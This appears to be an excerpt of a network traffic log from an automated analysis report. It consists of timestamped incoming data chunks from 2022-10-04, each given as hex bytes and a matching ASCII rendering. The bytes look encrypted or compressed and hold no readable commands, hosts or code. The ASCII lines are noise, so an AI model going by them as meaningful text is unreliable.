                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC21944INData Raw: db 86 45 71 78 53 74 23 d9 9f 74 bc 56 62 24 7d 15 29 d7 97 fa 38 54 d0 c3 85 3b 4f c7 65 52 1c ad d0 23 53 93 f3 68 d1 55 09 c2 db f8 50 af 09 fa b1 d7 85 fa 5e 41 45 7d 74 53 e0 f2 f7 4c c9 dd a3 1e ce ad d4 be e6 d9 20 d7 50 bd 4d d3 4e fb d2 6c ed fc 33 dc 35 b5 28 f5 5d c2 c7 2e 4f 89 04 af bd cb 67 70 ab 7d 41 ce 6b c8 a1 bd 6b f3 9a 97 8b e6 2d 3b 7b d0 0d ec 21 a6 90 74 69 4b 7a 13 c5 e9 13 54 64 72 ad 52 1b 54 be d6 60 a6 20 52 46 16 82 e8 a7 63 81 a2 55 92 e2 cb 3b 59 00 c4 59 a0 a1 34 02 22 dd 5a 69 79 ba 9b 91 97 bc 23 37 2e 77 83 12 77 73 3c 4d 2c 13 d1 90 14 33 af c2 07 a0 2b 17 b8 6e 3a ac 42 bd ad 37 c1 94 28 1c 71 22 aa a3 6a d3 d0 da 06 bc db f4 a4 f5 8b a8 6e 45 33 65 08 ac a3 2e 8b 9e 84 fa ad 93 58 86 d3 4d 17 41 7b fe b9 74 59 99 8b
                                                                                                                                                                                                                                    Data Ascii: EqxSt#tVb$})8T;OeR#ShUP^AE}tSL PMNl35(].Ogp}Akk-;{!tiKzTdrRT` RFcU;YY4"Ziy#7.wws<M,3+n:B7(q"jnE3e.XMA{tY
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC21960INData Raw: ac 1b cc 03 db ea 6c 56 df e7 b7 d0 62 29 38 cd b9 af fd 87 51 a5 4e 3e 84 7e f4 32 32 92 a2 41 f1 3c f1 a9 ba e8 9d b9 c9 99 8d f5 81 d5 33 32 29 a7 fb be cf f6 86 aa bb 51 62 b1 0a d7 f0 a5 eb 8d 74 11 4b 75 21 da b3 95 af 58 8b 3f 2f c6 57 73 29 ad e7 d9 62 81 45 76 a6 04 af fa 5d a4 ae dc 33 18 f6 38 d1 87 9e b3 73 22 76 ee 7b 3b 59 7d ef fd 68 72 f2 54 20 72 0f c1 a5 3b 5d 63 0a 32 38 dd 5d c5 ee a3 30 4e 24 25 bf 96 72 09 0f 43 71 76 dc 80 ab d6 85 a8 55 f8 7d e3 af 1a d7 10 0c 76 eb 63 8a b2 31 7e 0c 9e 3a 67 1a 41 3a ca 1e f2 c3 ac b9 c9 c4 90 9d a9 2d 1a 54 c8 c6 1a 06 67 3c 5e c5 b9 f9 51 1d f2 de c2 ef 58 ad f8 78 fe aa 95 54 89 ef 0c b7 c6 a7 8c 9d d5 31 6c 7f 39 1a c6 1c 06 6a 19 43 93 45 ae 88 84 36 23 20 c7 a2 a0 93 2f b0 4a 72 42 04 8c 59
                                                                                                                                                                                                                                    Data Ascii: lVb)8QN>~22A<32)QbtKu!X?/Ws)bEv]38s"v{;Y}hrT r;]c28]0N$%rCqvU}vc1~:gA:-Tg<^QXxT1l9jCE6# /JrBY
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC21976INData Raw: 44 6e 11 56 ce 05 f5 d6 fa 73 38 bb e3 95 26 aa 8b 45 a5 44 4e ea b4 8a 5c 11 d2 f8 ce 41 fe 43 1b e0 0c f2 86 ff 95 41 98 dd 3a 5b cd 38 52 a9 61 dc e5 bf 6d 40 db e6 81 59 01 f5 60 58 8e 63 47 82 0c 82 ab 24 a9 1e cd 81 25 5a c0 91 15 71 09 10 6d a4 5b 02 19 c8 11 4b 63 38 0e 46 f6 94 6e 37 d2 30 f7 a1 88 b6 a8 53 99 e9 78 1c 39 e1 17 d2 08 fe 8d 82 90 46 f3 7f 2a d1 18 33 93 a7 2e 0f 54 78 25 f1 f6 8e 73 18 68 69 52 6e c6 94 4a cc 09 c9 37 00 d4 29 6f 49 32 6f c9 68 a4 25 8e 96 94 56 c9 37 df 34 d6 4c 0d cc ed 59 5d 15 ab 01 17 0d 4a 74 6c 65 2e 2d bd e1 79 2f de 61 ad 69 75 f6 82 b9 fa a9 b1 38 f4 50 dc 6e 8c b0 b2 8c 56 af ca e7 45 69 dc d0 80 70 36 2b a5 e2 39 09 a4 0d fd 12 21 8c 12 ce 70 64 6d 3e 54 84 8f 76 1d 9d 69 f2 a1 14 ba 1e fd b7 1b 37 e6
                                                                                                                                                                                                                                    Data Ascii: DnVs8&EDN\ACA:[8Ram@Y`XcG$%Zqm[Kc8Fn70Sx9F*3.Tx%shiRnJ7)oI2oh%V74LY]Jtle.-y/aiu8PnVEip6+9!pdm>Tvi7
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC21992INData Raw: 4d 96 39 6d 4e b0 39 d4 96 ce 8e af 6c a6 88 a1 56 4f b2 4a a1 e8 69 ea 60 21 eb e9 cf 37 45 b2 bc 45 6d 8c 8c 83 5d 81 b3 b3 de cb f4 44 31 13 e7 71 eb f5 9d f0 f3 b3 b8 dc 2c 24 c6 b6 4b d2 0b bc d4 a0 4a 9e aa 9a 38 db f6 33 6b a7 57 b7 35 c6 4f 7a e8 c6 0f 9e 18 40 13 bb 3e 50 fe 53 dd 05 ef a3 32 ff c5 6d 98 eb 20 cb 22 9f 94 93 a1 11 19 b6 3a 50 c5 6c fd b4 4c af 45 bb 2b df ad 37 4f 00 7c 2f 46 eb c1 e0 e4 e1 0e 4f c3 10 98 e1 e6 32 c5 b7 c3 37 f4 41 18 d2 5d 67 35 bf 98 94 ba 18 6b d3 d9 6b fb 38 14 bb a9 8a 3a a9 48 bd 8a 9d 34 e1 32 7b f6 fd f9 88 ad 3e 35 15 97 08 8b dd 05 51 a4 6f 60 67 65 90 26 7a 21 3b 90 0e 11 56 f7 9a c9 91 75 c5 9d bc 14 64 b1 b0 3e 77 9a b3 5c c9 54 e2 4d 30 d1 af 37 d4 68 e8 09 66 4d 60 3e 0a 71 2f 80 e5 b5 fc 6c 0b 5d
                                                                                                                                                                                                                                    Data Ascii: M9mN9lVOJi`!7EEm]D1q,$KJ83kW5Oz@>PS2m ":PlLE+7O|/FO27A]g5kk8:H42{>5Qo`ge&z!;Vud>w\TM07hfM`>q/l]
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC22008INData Raw: 7d 61 07 1f b9 36 3c 9d 03 97 8d 2d 2e 90 0f 15 96 6c d2 3f 72 13 60 db aa 4a 25 bd dd aa 89 8e b3 29 e9 c4 73 3e 85 f3 b7 22 56 ac df 48 45 f5 aa 2d 30 8a 34 88 ef 06 25 d7 a6 74 a5 9f 4e 42 94 02 99 74 a1 62 93 12 5b 2b c8 dc fb 95 8e 82 dc a4 9b 96 71 b8 e4 b6 98 ef 8a 81 91 d5 9f 7d 54 a1 99 fe 1b 3c a8 68 52 57 5f 38 82 34 58 23 72 3d c6 c9 51 91 8b ef 25 d2 34 41 8b fd 6f c7 1b b3 64 36 b5 f9 50 91 38 50 3c 09 82 e8 17 e6 c9 40 ef 5e 23 20 49 27 c7 1f 91 a5 4b 81 e5 5d 72 89 cc b1 6d 79 8c 14 4a 22 2e 14 47 73 ab a4 df 10 b7 33 c3 76 74 f3 81 ad bb 2b 72 87 06 91 03 4d 39 0a 48 43 2f 0d d2 fd b3 f7 e9 75 5e 58 b3 6b 40 da 03 57 06 f5 4d 98 6d 17 91 9f 6f f7 7f 06 af 7c 4c 14 4a 47 10 6d 7b 1f 2d fa 0a 57 92 60 d1 21 4e 83 62 d1 ac 44 8b 66 ea 5c 2d
                                                                                                                                                                                                                                    Data Ascii: }a6<-.l?r`J%)s>"VHE-04%tNBtb[+q}T<hRW_84X#r=Q%4Aod6P8P<@^# I'K]rmyJ".Gs3vt+rM9HC/u^Xk@WMmo|LJGm{-W`!NbDf\-
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC22024INData Raw: 77 47 02 4f cb 8a 59 81 43 be 95 1b 4c bc e1 56 72 d0 0d c6 b4 8c 8e 3b 61 4c 24 37 10 f2 35 3f af 36 25 4c aa 5e 92 21 da b7 3a f3 7d 91 42 a6 cb 16 6e 4f 4c e5 48 38 66 2d 2e 78 77 e7 a4 e6 b6 cf da 9f 3b 0a 22 51 9b c6 46 46 93 8f 13 2f 71 e4 62 dd 57 d7 4d 2d 59 92 00 84 1f 95 ee 56 d5 c6 6e b6 45 96 2b ec bb 0a c2 8f d2 59 02 06 b0 d8 ec 8c dc 6c 8a 43 36 f8 94 85 3f b7 ca 98 a9 e9 d6 a1 cc 3a dd 65 39 fa 16 3a ab 01 7d b4 a1 5a 5b 8c 4c 07 f7 42 09 17 12 e9 d8 d5 36 6e 65 aa f2 a7 30 c4 32 07 b0 d1 23 10 fc 03 cd 7a 54 f7 ec d6 55 ba d8 2e f6 c9 8a 92 e6 2a cd 72 06 24 75 0d 92 40 ea b8 b1 2c c7 5a d4 15 71 50 7d e6 a4 14 2b aa 3b b5 4a bd ff 4c 35 f8 35 7f 10 ea 0c 5d 2d 10 4b c9 84 58 0f fb 6f 30 14 ff fc 9c 2c 4f da 14 6b af e8 68 81 b0 d0 26 d7
                                                                                                                                                                                                                                    Data Ascii: wGOYCLVr;aL$75?6%L^!:}BnOLH8f-.xw;"QFF/qbWM-YVnE+YlC6?:e9:}Z[LB6ne02#zTU.*r$u@,ZqP}+;JL55]-KXo0,Okh&
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC22040INData Raw: 78 e9 1b 51 63 5a 93 a3 8e 47 0c 4c c9 64 de a1 56 10 5e 21 70 36 b6 7c 0e bb 2c 9d 23 92 1b 36 2f 01 e7 e9 c8 c8 0a 70 1f 25 63 c9 04 7f 6d ca 13 91 da f5 d9 45 19 a0 0f c5 51 19 12 c1 25 38 28 0b 43 c3 b9 db d5 db 44 a4 95 a6 c6 a9 26 60 06 fc d2 c9 0a a2 0d 2d d3 b9 c8 69 59 be 5d fb e7 92 4d 13 a3 27 ee 16 dc df ce 65 cb 10 f6 3e 29 f1 9a a5 80 97 71 55 a0 f2 9a 27 11 92 ef ab c9 8b aa b6 c9 0c ba 46 b4 09 41 9b 55 a3 ee 2e 06 38 37 c4 bf f4 2f da 90 31 8b 6a 55 2b ca e5 b8 76 bd a9 2b 6c 99 ae 88 1c 24 82 c3 4a bf 19 24 bd bb 71 1f 4c 15 1f 93 df 70 f5 4e d9 c9 d6 e7 42 94 04 f0 9d 23 63 89 1f 42 56 fa bc 66 0e e1 88 37 7a eb 8a e1 e9 66 18 b3 29 cf a3 bb 18 74 f1 9c d3 0c dc b0 65 5f 09 6c 92 be cf 7b 15 69 44 34 12 df 01 12 82 e1 51 57 a9 33 f9 b7
                                                                                                                                                                                                                                    Data Ascii: xQcZGLdV^!p6|,#6/p%cmEQ%8(CD&`-iY]M'e>)qU'FAU.87/1jU+v+l$J$qLpNB#cBVf7zf)te_l{iD4QW3
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC22056INData Raw: 3d be 4b 93 0f 82 ee b1 7c 83 5f ae 51 e5 ae ea 05 cf b4 76 4f b6 56 45 91 01 6e 94 90 95 f4 bb 6e 0d b4 9e 99 89 26 2e dd 23 d6 17 f5 a0 8d a9 18 82 e4 23 7f 9b 31 69 af db 7f 11 bc 56 8e 75 bd f7 5c 87 2c 98 8f 2c df 93 fa fc 76 b8 95 e0 9d 96 eb b9 72 52 66 71 da a4 6b 88 fa e4 3b cb 6b 0d 63 20 a2 c2 db d1 4d c4 72 66 ac 4c 8b 53 da 34 1c fb 6f 16 9e c3 2b 0e 07 4b ca 43 37 5f 60 83 26 97 3e e3 37 9c e2 fb 85 75 c4 76 c0 fe fd 03 08 62 b0 52 3e a4 bd d9 8f 25 9b 44 7e c1 b1 3a 0a c3 f4 2f 3a 38 ee d9 42 cd 41 35 aa 62 7f 12 89 11 7f e6 24 e0 b9 fa 14 b9 e8 f4 8f 52 b7 0d d0 91 73 d8 1c 15 ff d2 5c 34 0d 50 41 eb ac ff 5a c9 56 b1 95 52 ea 23 ff 6c ea dd f3 72 9f 21 61 b9 ea de f8 21 e5 6c 1d fb 2b 01 50 a5 27 85 40 eb 73 33 70 cd 05 70 76 1e 06 9c e3
                                                                                                                                                                                                                                    Data Ascii: =K|_QvOVEnn&.##1iVu\,,vrRfqk;kc MrfLS4o+KC7_`&>7uvbR>%D~:/:8BA5b$Rs\4PAZVR#lr!a!l+P'@s3ppv
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC22072INData Raw: 87 ca 0d f7 8a eb f8 ee 94 cf 24 0a 60 38 07 bf 4a be 9b 51 38 dc 6c 67 ea ab 62 9b f4 5a f5 a9 87 52 cc 74 4d 6f 19 e1 af 11 aa f1 f1 2a eb 8c 56 00 dc b8 cb 23 46 ba 70 7b 21 3b 65 97 1f 20 40 c0 bc 70 3f e7 68 f2 38 13 b8 f8 b7 e9 8a 90 9b f4 9b 98 7e 37 36 05 46 c8 be a6 27 41 d7 02 4a 59 0e 6a 99 f3 9f 3d 18 0d 48 cb 7a f0 73 ea 5b 78 9e a1 e8 c9 02 19 e6 37 71 5a 2d 64 11 0d 2e a7 0c b0 f0 e2 a7 be 5b b1 be 5b c3 b0 7e 8b d7 48 36 d8 c6 c6 c1 91 03 e4 2c fe ea 6d 43 61 87 7c fe 59 93 cb 6c 0b d6 dd 13 17 ee 45 cc 4c ce e0 1f a7 ff 7e 67 56 8f 5c 27 b5 f8 c0 1f 05 d0 ff 37 11 8d 41 01 3f 31 c7 aa 99 18 2b 3d e2 99 65 c9 0d 72 60 d2 73 9f 44 b4 1f ec 7c b7 20 3f e2 19 04 c4 cb 75 62 6e fc ee 46 c7 df bd 02 68 41 ff 6e 2d 9d 44 ac 3f 75 ea 34 44 dc 89
                                                                                                                                                                                                                                    Data Ascii: $`8JQ8lgbZRtMo*V#Fp{!;e @p?h8~76F'AJYj=Hzs[x7qZ-d.[[~H6,mCa|YlEL~gV\'7A?1+=er`sD| ?ubnFhAn-D?u4D
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC22088INData Raw: 28 6c 7d 68 98 53 32 12 34 c4 10 47 67 73 8c 3e cd d6 d9 4a f4 32 fb 7b af 63 ce 87 25 aa 8a 8c ff e8 83 9c 58 ff 07 87 da bc 8a 18 da f3 77 9d 7d 8f 6d ac 46 31 b0 89 60 26 8f a0 97 24 ea fd 08 3d 18 f4 30 97 2f df 37 03 9c 16 99 b2 fb 47 3b 76 0a 5f ec 1b 6a 50 63 bc 55 1f eb 2f 7f b1 1b 4a d4 fc c7 af 8d a9 37 0c 00 2d bc fc 82 9f 20 64 83 9a f6 e8 ce dc bb 3b 66 58 a0 83 2f b2 82 6d aa 4a 47 6c 06 c8 eb fa 5e da 2f 76 95 41 c6 2e 95 dd 4e 34 36 e4 c2 26 07 66 38 be 8d c5 16 91 e7 87 8d 91 08 74 a4 44 08 d4 c1 a1 51 63 d0 90 e1 ca d6 bf 65 0f 25 b0 fe bf c4 94 ca 65 b5 1b 32 cc 60 8b 34 fe 1a 5a e0 e1 c9 10 fe 1c c0 70 b9 c7 75 73 26 d2 f0 d2 3c 02 fb 38 7e 63 13 b8 40 6f ec 11 b0 a2 2f 48 4e 97 a8 8e 48 b3 6a bb 98 4d c6 46 5d b4 39 d5 45 f3 71 14 91
                                                                                                                                                                                                                                    Data Ascii: (l}hS24Ggs>J2{c%Xw}mF1`&$=0/7G;v_jPcU/J7- d;fX/mJGl^/vA.N46&f8tDQce%e2`4Zpus&<8~c@o/HNHjMF]9Eq
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC22104INData Raw: 06 70 c3 e9 f4 b2 3c d6 d6 94 74 dd eb 7e ea 76 58 d8 b9 07 72 6a 65 b1 3a 77 4b 88 9e 2b ec 77 b6 5b 45 77 20 88 85 96 dc 2f f7 fe b4 b6 c0 32 49 35 32 e8 46 6b 89 ec 07 23 44 43 d0 f6 4a bb ca 27 dc d8 a9 14 6c 63 86 c8 b7 d9 51 3a fc 1a d3 69 3a 4b e7 b5 e4 e6 b3 cb b5 fb b4 e9 6c 00 0e 99 19 8f 93 1e ce ff 65 99 c8 6e 3e 20 72 1f d5 be 96 8f fc 24 b5 a4 25 0b 92 db 7f d8 a2 96 cb a2 e3 43 d1 ad 00 cb 34 4c 1c fb 57 70 c7 62 4a ce ad 94 cb 4b 41 ae 68 f1 72 7c b4 c2 91 7a 13 5f ce 18 6c 24 b4 2e 3c d5 64 ec dd 23 a5 77 1e aa e8 81 6c 99 d6 7f 27 be 5b 26 f8 af ac 13 e1 7c 6e e8 6c 0e 30 05 5a d5 de 70 10 ff d6 32 b1 1b d0 bd 46 98 9c 9d dc 14 2f 08 6a 41 8e 52 3b 4b ac 22 2d 69 03 bc 1e 47 53 1f 93 73 3e d5 d8 bc 7d 63 74 b4 05 8e 1a ff 19 2e 51 f1 ca
                                                                                                                                                                                                                                    Data Ascii: p<t~vXrje:wK+w[Ew /2I52Fk#DCJ'lcQ:i:Klen> r$%C4LWpbJKAhr|z_l$.<d#wl'[&|nl0Zp2F/jAR;K"-iGSs>}ct.Q
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC22120INData Raw: 61 64 40 f3 55 47 1a 58 f0 dc 21 f7 1a 96 2d 38 fb 13 df 2c 39 63 22 57 89 ff 4c 23 13 cb 1b bd 81 73 ca 23 b1 fb f5 5e 84 52 40 4b cc 39 0f 0e f1 91 8f d5 92 57 97 02 1d 08 fc d0 14 a2 a3 ad a8 ed 7e 66 9d 1a f7 3a b2 b8 e2 42 89 a9 6b dd 9f a2 b0 1c 12 cd aa 8c 9f 32 89 a5 87 c0 74 92 25 15 b7 1b 1b 1a 41 5b 43 34 fc 84 59 44 e1 81 8b e9 23 19 68 98 3f 9b 03 bd 77 84 1d e7 11 ef 6b ff 1c e1 6b fb c4 ea 19 69 27 86 e4 df 5b aa d9 bc 8a 81 ba e5 76 e8 e4 c8 3f f2 eb fa 07 66 16 96 19 0c 44 78 73 63 66 2b 6f 81 8b c5 27 3d 48 cb ae eb 24 64 f1 a1 9a ea 35 35 ca da 9e f0 fa be f3 7f 35 95 92 18 c3 1c 71 73 1b 6e 67 8b 47 48 ca 0c 3d 99 c7 b1 8f 4b a1 5a 93 e2 dd b7 9a 8e 76 9c f3 10 d8 c8 af 16 4e 71 82 80 7a 17 7f 2e 2b ba 4c ea 10 9b 51 06 fa 68 bb 86 a0
                                                                                                                                                                                                                                    Data Ascii: ad@UGX!-8,9c"WL#s#^R@K9W~f:Bk2t%A[C4YD#h?wkki'[v?fDxscf+o'=H$d555qsngGH=KZvNqz.+LQh
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC22136INData Raw: ac 73 6d 1e bc fe 01 ea 95 6e 4a b7 28 e7 34 da 8f e9 b8 91 c7 ff f1 88 02 47 46 0a 77 3d ca 8c e2 a5 5a 08 dd 45 ce a8 88 d6 14 94 fc af d7 0e 6f a7 1f fd 3f 8c 0d ed 96 39 d3 2d 77 4f 56 59 b6 c7 bc a7 f9 45 55 34 ef cf 22 2a b3 c3 2a c7 0e c3 eb 33 cc 06 2a bb 3a 43 ca 70 10 a3 70 2e 88 a2 4a 5e 01 c0 94 fb 11 53 7d b0 aa da 67 40 1b 2d ab 30 7f c4 82 74 fe 3e 11 d1 6e f5 ab be 00 47 3c 1a 3e b0 bd 72 f2 8b 07 70 48 02 31 60 e5 ee c4 0f 0d f3 e7 ae 99 b0 06 6b d8 b3 63 ae 0e fb 83 b6 cf 8d 14 b3 1d ee a5 ec 88 c0 55 39 23 0a 4d 12 44 02 d5 f4 01 35 6c 6e 5f 4d ce d4 31 db 42 a8 8e 1a df a3 a4 57 5b 33 8a bc 36 be 5e c1 b8 7e 89 d5 d8 2c 18 5d 81 4a 02 bd 01 2f e5 c2 af 14 d6 3c 00 5c c0 49 29 7d 46 c2 69 c1 32 f4 77 16 5c e4 2b 40 7a b9 c9 4f 55 fb 08
                                                                                                                                                                                                                                    Data Ascii: smnJ(4GFw=ZEo?9-wOVYEU4"**3*:Cpp.J^S}g@-0t>nG<>rpH1`kcU9#MD5ln_M1BW[36^~,]J/<\I)}Fi2w\+@zOU
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC22152INData Raw: e2 2d a8 93 41 e1 39 c9 1b 72 95 c5 87 80 89 85 1f 4a 33 94 42 4e f7 bc cc 5e f8 d4 ee 7b b4 88 96 f4 7a b3 ca c7 31 53 b0 96 b6 d9 cc 3f ee 2d 9b c2 e8 3b be 6b 2b b8 87 28 61 d3 9c dc 1a 62 c4 c6 a2 45 a8 6a c8 be ba 55 40 5b 51 c7 4d ec 48 45 ae 77 70 fe 40 83 ec c8 96 80 db 89 72 77 29 4e 54 c3 0c 84 9e 8b 6d 3e 23 75 97 d8 09 89 7c 80 30 a8 b1 16 92 62 1a 9d ef 47 03 e6 db f6 f0 35 f4 e1 e1 32 bb f1 5b 27 cb 95 9e 02 81 ab 91 d1 e3 c8 41 45 1c a1 02 fa 26 75 57 14 45 fd b4 a8 48 19 25 dd df cb 76 2d ab 69 7a 21 d9 b4 e5 77 38 6c c7 0e fc b8 d4 81 7d 5a ba ed 0b 5e 42 b4 35 e3 8b b1 6a 2f ce e7 d3 20 f6 2d 4f c4 dc 67 d4 65 60 44 a2 13 d8 48 07 87 fc 2f 48 73 d3 9a eb 43 e8 d8 d7 2f d5 cd a3 f9 e4 5b b3 40 8d 60 1d e7 dc 63 c3 70 4b f9 2d ae 15 dd 64
                                                                                                                                                                                                                                    Data Ascii: -A9rJ3BN^{z1S?-;k+(abEjU@[QMHEwp@rw)NTm>#u|0bG52['AE&uWEH%v-iz!w8l}Z^B5j/ -Oge`DH/HsC/[@`cpK-d
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC22168INData Raw: 64 0b 7d f7 fd 55 88 b0 79 f2 de e3 20 27 9f 12 9e a7 f9 f4 0c 11 c8 81 19 71 1c f5 00 11 f1 74 2a bd d8 be bf 76 de 18 43 f3 ae 22 0e 51 58 80 d9 f7 88 43 d4 78 ec de 38 88 7e f8 69 c2 12 8e 73 ae e2 2c c3 c1 ff b7 ac e9 3b 2a 50 0c 04 62 ff 73 4c f9 4d 3c 29 c1 df fb c7 5b 8b 9e 55 9c b1 11 64 25 99 cf c5 96 2c 94 0e 8f 77 81 f1 5c 47 13 9f e3 26 af 19 34 f9 67 f6 88 20 40 3a 2d 17 e4 23 ad 5f b3 42 64 e3 89 b6 42 84 e2 96 f2 c7 c8 68 1c a9 2b 79 b2 00 f3 54 4b 9a d0 60 e3 da 1e da 04 f0 bd 7e ca 94 3e 49 af ef 8e e4 27 3f 4f c4 4f aa 2e c1 69 28 7e 30 51 c1 2f 16 6c 5b aa 90 39 5b 08 e6 68 b0 26 9f 51 40 b4 46 55 20 a2 2e e8 24 ec dc b0 15 cf 07 08 33 6e 61 eb 84 52 9a 21 c9 bb a5 b5 c4 40 be 71 7f 48 e4 49 35 30 1a bd 4d 7b 1b 1f af e3 e7 c6 5f 2d 59
                                                                                                                                                                                                                                    Data Ascii: d}Uy 'qt*vC"QXCx8~is,;*PbsLM<)[Ud%,w\G&4g @:-#_BdBh+yTK`~>I'?OO.i(~0Q/l[9[h&Q@FU .$3naR!@qHI50M{_-Y
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC22184INData Raw: 71 0e 13 a8 8c 7e 9a 18 7b 94 ad 8d c5 e4 5b 62 23 e9 3d c8 da 0b 3d 78 47 f3 d3 50 c8 a7 58 8b eb f7 c4 15 b4 0a 46 b5 5e fa 31 48 fc 47 c5 c6 d5 62 5e bf 97 34 7f cd 9f 63 90 d1 63 90 a9 39 43 b5 9c 65 72 03 ac 82 48 b4 11 61 37 8d c3 9a 3b 7c 9a 18 da 6b 25 d9 a2 d0 ba 53 ab 5f d7 30 4d de 79 10 d9 3c 90 18 67 78 b2 d9 ef e8 8c a1 e3 19 7f d8 30 b3 47 79 10 ec c9 37 5a 89 66 4c 5f 9a c2 9e 1c 22 75 e8 13 d5 e2 d7 96 b5 5b 96 4c 3b d4 55 8e 6b a2 78 d3 b3 01 eb f1 a0 0c 01 7a 0a 5c 95 e3 90 11 8c 0b 3c 0f 84 d2 e2 26 b3 2d fc 03 3d a0 f2 b6 6e 39 e7 8e 76 55 9a dd 3f 20 c6 e9 95 c3 35 2f 8d 86 8b c6 b6 75 8b d3 cf 96 07 66 b7 57 52 07 49 f8 3f 27 ab 7a a0 e4 1b 6e 29 14 80 d7 c6 20 a9 7f 6c 9a 5d fb 1c 5f 6e b9 90 48 c9 62 a7 83 88 42 e5 5f 7e 9f 37 c9
                                                                                                                                                                                                                                    Data Ascii: q~{[b#==xGPXF^1HGb^4cc9CerHa7;|k%S_0My<gx0Gy7ZfL_"u[L;Ukxz\<&-=n9vU? 5/ufWRI?'zn) l]_nHbB_~7
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC22200INData Raw: b1 78 ef 4b 28 b7 4e 30 1b 64 74 7d 3d 71 71 df de dd 61 02 ed 01 09 f0 45 cf f8 2d 9a dc 10 7a 34 3f 3a ae ca b0 4c 9e a0 77 95 cf 7e be 4b c4 5a ab 8f a3 dc 68 da 13 0b cc af 50 c6 99 33 2b 82 f1 2e 9d 2b ec 79 9e f6 77 68 43 d0 21 f4 83 2f 5d 41 f2 2d ac 09 9d 1c 03 27 cb bf e3 af 14 2e 69 cc 45 d9 0c e7 11 67 d0 02 83 f9 26 45 9b 23 45 67 08 98 72 b5 46 77 a3 59 a1 43 9b 32 cd f7 54 92 65 dc 5b ea 0e 9f 7a 5d 44 18 9c 77 af f4 81 34 ba b2 ae 69 f7 de 33 c1 fc 45 18 20 12 fd c6 4f bb 8f 44 ba 45 6b 11 62 0d b4 5f e6 25 ed 2b 55 e5 04 0b e3 0a 97 b0 67 a9 c1 0e cb 6e ed df a0 1f 6f fa 4c 0e 1b cd 35 89 2d 92 8b 19 1c 92 f7 71 f3 3e c5 53 18 d4 07 1f 6c 6a cf 2e ee 61 e5 cc e7 87 5f 8c 8b 8a 90 43 83 7a 79 39 0d cd 66 ba dc 38 44 da 09 58 48 ab 4c b3 61
                                                                                                                                                                                                                                    Data Ascii: xK(N0dt}=qqaE-z4?:Lw~KZhP3+.+ywhC!/]A-'.iEg&E#EgrFwYC2Te[z]Dw4i3E ODEkb_%+UgnoL5-q>Slj.a_Czy9f8DXHLa
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC22216INData Raw: 05 4b bd 91 4b 1c f9 fd a6 67 85 fa a5 23 5f 88 4c 3c 85 a7 e4 26 21 15 9e 2e dd e0 d2 4c 4b 1b 07 c9 2d 33 c4 ec d1 dc 1c 9e 08 63 98 f3 a1 85 f8 2d bc a8 c8 01 99 f5 2c 13 ed 7e e8 72 69 1d 5d cf 37 da f0 99 8e 62 f7 13 fb e7 aa bb ef 09 9d 20 db 01 a2 91 06 3e 2a ee 2b 49 3c 02 a3 eb 37 78 4b 5b 44 f1 50 a2 53 6b 13 4d e8 70 28 a4 b9 91 5d 86 75 b0 15 2a 9a fc c5 e2 6b e8 42 4e fb 85 e1 2f dc 45 a2 7e 22 15 c7 a6 e7 79 de 0b 75 c6 c6 ef 24 46 a8 73 82 56 fd 32 ae 51 bd 48 fb 07 6e e2 6f c3 73 0d 1a 65 59 d8 04 03 e1 72 a9 57 c6 69 41 15 eb 53 c7 c3 21 8c 93 bf 8a 4b cb 6d 70 e1 10 88 fe 10 0e 38 0f 1b 08 dd 79 af 0d 18 b6 c1 f7 b3 c6 be 36 2c 5d 83 8e f9 d0 9a d3 e0 df 0a 99 80 fe f3 9c 1d 3f 69 04 75 48 ae 54 75 f9 df 2f 5e 10 d7 cb cc bb da 7d ad 07
                                                                                                                                                                                                                                    Data Ascii: KKg#_L<&!.LK-3c-,~ri]7b >*+I<7xK[DPSkMp(]u*kBN/E~"yu$FsV2QHnoseYrWiAS!Kmp8y6,]?iuHTu/^}
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC22232INData Raw: 14 b3 d8 5d 12 cc 84 08 80 3e a4 bd 59 21 21 8c 9a 58 27 57 29 26 48 72 2a 88 0a a5 f6 1b 28 1a 83 38 e0 8d f3 7b f3 ee a2 b7 b4 94 bf f0 51 04 d6 b5 77 16 ee 3a e3 01 d5 2a 33 6a e2 d2 7e 85 b9 c0 3f 1a 63 91 d8 ae 15 cb 4d e2 fc 52 bf 1a e9 bc cd d3 ba f3 20 be 9c c4 22 7f 5d a3 92 db 27 88 4e b3 7e fc 38 b3 24 71 37 dd d7 13 a5 10 91 6c 56 7c 22 b0 4d 51 0e ec 88 9b 36 f7 ee 82 a0 39 ce a1 4e 50 70 77 4e 24 91 e1 8f 42 06 72 88 f3 62 ae 3e 70 17 17 02 cd 72 3e 48 42 67 bb 7d 44 1e d6 86 04 3f 17 95 7b 98 f6 b7 dc e6 84 6d 03 f6 dd 0a 85 1c c8 ca 42 b1 c0 a6 1e 92 08 c1 89 4d 9f 87 7e bc 92 25 35 0e f9 b0 c3 21 38 1f 69 f4 4c de 0f 16 f8 72 06 c0 fd 5b a5 d7 29 2b 27 98 0a 77 9b 6b f2 e9 60 b7 dd 82 a3 ff 40 9d 68 33 0b 03 7b f1 24 a0 3e b3 ed 3d a3 09
                                                                                                                                                                                                                                    Data Ascii: ]>Y!!X'W)&Hr*(8{Qw:*3j~?cMR "]'N~8$q7lV|"MQ69NPpwN$Brb>pr>HBg}D?{mBM~%5!8iLr[)+'wk`@h3{$>=
